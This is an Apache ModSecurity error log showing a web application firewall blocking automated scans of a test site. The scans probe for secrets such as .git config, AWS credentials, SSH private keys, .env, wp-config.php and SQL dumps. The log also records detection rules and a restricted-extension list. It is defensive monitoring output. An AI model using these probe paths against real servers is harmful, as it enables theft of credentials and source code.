[Sat May 18 21:38:12.151565 2024] [:error] [pid 3319296] [client 94.156.79.55:57694] [client 94.156.79.55] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZkkDpN1NfYhphDrDGZkBRAAAABU"]
[Sat May 18 21:38:12.152170 2024] [:error] [pid 3319296] [client 94.156.79.55:57694] [client 94.156.79.55] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZkkDpN1NfYhphDrDGZkBRAAAABU"]
[Sat May 18 21:38:12.152848 2024] [:error] [pid 3319296] [client 94.156.79.55:57694] [client 94.156.79.55] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZkkDpN1NfYhphDrDGZkBRAAAABU"]
[Sat May 18 21:42:24.645737 2024] [:error] [pid 3319294] [client 35.90.1.127:56460] [client 35.90.1.127] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZkkEoGiRN9szswPHORjSAAAAABM"]
[Sat May 18 21:42:24.646365 2024] [:error] [pid 3319294] [client 35.90.1.127:56460] [client 35.90.1.127] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZkkEoGiRN9szswPHORjSAAAAABM"]
[Sat May 18 21:42:24.646787 2024] [:error] [pid 3319294] [client 35.90.1.127:56460] [client 35.90.1.127] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZkkEoGiRN9szswPHORjSAAAAABM"]
[Sun May 19 01:47:43.075945 2024] [:error] [pid 3321290] [client 213.152.176.252:4881] [client 213.152.176.252] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "Zkk-H4ob-UgX1rhqwa_u8AAAAAA"]
[Sun May 19 01:47:43.076835 2024] [:error] [pid 3321290] [client 213.152.176.252:4881] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "Zkk-H4ob-UgX1rhqwa_u8AAAAAA"]
[Sun May 19 01:47:43.077297 2024] [:error] [pid 3321290] [client 213.152.176.252:4881] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "Zkk-H4ob-UgX1rhqwa_u8AAAAAA"]
[Sun May 19 01:47:43.087389 2024] [:error] [pid 3321198] [client 213.152.176.252:35419] [client 213.152.176.252] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Zkk-H6O3-AjEeOWUP2AzoAAAAAk"]
[Sun May 19 01:47:43.089408 2024] [:error] [pid 3321199] [client 213.152.176.252:65197] [client 213.152.176.252] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Zkk-H59iWn5XH-Z-BcbEbwAAABA"]
[Sun May 19 01:47:43.089719 2024] [:error] [pid 3321199] [client 213.152.176.252:65197] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Zkk-H59iWn5XH-Z-BcbEbwAAABA"]
[Sun May 19 01:47:43.090004 2024] [:error] [pid 3321199] [client 213.152.176.252:65197] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Zkk-H59iWn5XH-Z-BcbEbwAAABA"]
[Sun May 19 01:47:43.090153 2024] [:error] [pid 3321200] [client 213.152.176.252:25331] [client 213.152.176.252] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "Zkk-HzTC2V__gaLo9oUzpAAAABo"]
[Sun May 19 01:47:43.090906 2024] [:error] [pid 3321200] [client 213.152.176.252:25331] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "Zkk-HzTC2V__gaLo9oUzpAAAABo"]
[Sun May 19 01:47:43.091314 2024] [:error] [pid 3321200] [client 213.152.176.252:25331] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "Zkk-HzTC2V__gaLo9oUzpAAAABo"]
[Sun May 19 01:47:43.092739 2024] [:error] [pid 3321198] [client 213.152.176.252:35419] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Zkk-H6O3-AjEeOWUP2AzoAAAAAk"]
[Sun May 19 01:47:43.093171 2024] [:error] [pid 3321198] [client 213.152.176.252:35419] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Zkk-H6O3-AjEeOWUP2AzoAAAAAk"]
[Sun May 19 01:47:43.095259 2024] [:error] [pid 3321197] [client 213.152.176.252:18065] [client 213.152.176.252] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Zkk-H479eoRS3rRzybvswwAAAAQ"]
[Sun May 19 01:47:43.095445 2024] [:error] [pid 3321197] [client 213.152.176.252:18065] [client 213.152.176.252] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Zkk-H479eoRS3rRzybvswwAAAAQ"]
[Sun May 19 01:47:43.095641 2024] [:error] [pid 3321197] [client 213.152.176.252:18065] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Zkk-H479eoRS3rRzybvswwAAAAQ"]
[Sun May 19 01:47:43.095842 2024] [:error] [pid 3321197] [client 213.152.176.252:18065] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Zkk-H479eoRS3rRzybvswwAAAAQ"]
[Sun May 19 01:47:43.165736 2024] [:error] [pid 3321200] [client 213.152.176.252:44541] [client 213.152.176.252] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/id_rsa found within REQUEST_FILENAME: /.ssh/id_rsa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Zkk-HzTC2V__gaLo9oUzpQAAABo"]
[Sun May 19 01:47:43.165925 2024] [:error] [pid 3321200] [client 213.152.176.252:44541] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Zkk-HzTC2V__gaLo9oUzpQAAABo"]
[Sun May 19 01:47:43.166088 2024] [:error] [pid 3321200] [client 213.152.176.252:44541] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Zkk-HzTC2V__gaLo9oUzpQAAABo"]
[Sun May 19 01:47:43.167208 2024] [:error] [pid 3321198] [client 213.152.176.252:63447] [client 213.152.176.252] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "Zkk-H6O3-AjEeOWUP2AzoQAAAAk"]
[Sun May 19 01:47:43.167444 2024] [:error] [pid 3321198] [client 213.152.176.252:63447] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "Zkk-H6O3-AjEeOWUP2AzoQAAAAk"]
[Sun May 19 01:47:43.167592 2024] [:error] [pid 3321198] [client 213.152.176.252:63447] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "Zkk-H6O3-AjEeOWUP2AzoQAAAAk"]
[Sun May 19 01:47:43.242281 2024] [authz_core:error] [pid 3321198] [client 213.152.176.252:37277] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun May 19 01:47:44.961530 2024] [:error] [pid 3321201] [client 213.152.176.252:51251] [client 213.152.176.252] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Zkk-IO245Qo6tNg9hzo3FgAAACA"]
[Sun May 19 01:47:44.961688 2024] [:error] [pid 3321201] [client 213.152.176.252:51251] [client 213.152.176.252] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/wc.db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Zkk-IO245Qo6tNg9hzo3FgAAACA"]
[Sun May 19 01:47:44.961913 2024] [:error] [pid 3321201] [client 213.152.176.252:51251] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Zkk-IO245Qo6tNg9hzo3FgAAACA"]
[Sun May 19 01:47:44.962093 2024] [:error] [pid 3321201] [client 213.152.176.252:51251] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Zkk-IO245Qo6tNg9hzo3FgAAACA"]
[Sun May 19 01:47:44.964188 2024] [:error] [pid 3321197] [client 213.152.176.252:57009] [client 213.152.176.252] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zkk-II79eoRS3rRzybvsxQAAAAQ"]
[Sun May 19 01:47:44.964384 2024] [:error] [pid 3321197] [client 213.152.176.252:57009] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zkk-II79eoRS3rRzybvsxQAAAAQ"]
[Sun May 19 01:47:44.964563 2024] [:error] [pid 3321197] [client 213.152.176.252:57009] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zkk-II79eoRS3rRzybvsxQAAAAQ"]
[Sun May 19 01:47:45.034261 2024] [:error] [pid 3321201] [client 213.152.176.252:2349] [client 213.152.176.252] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Zkk-Ie245Qo6tNg9hzo3FwAAACA"]
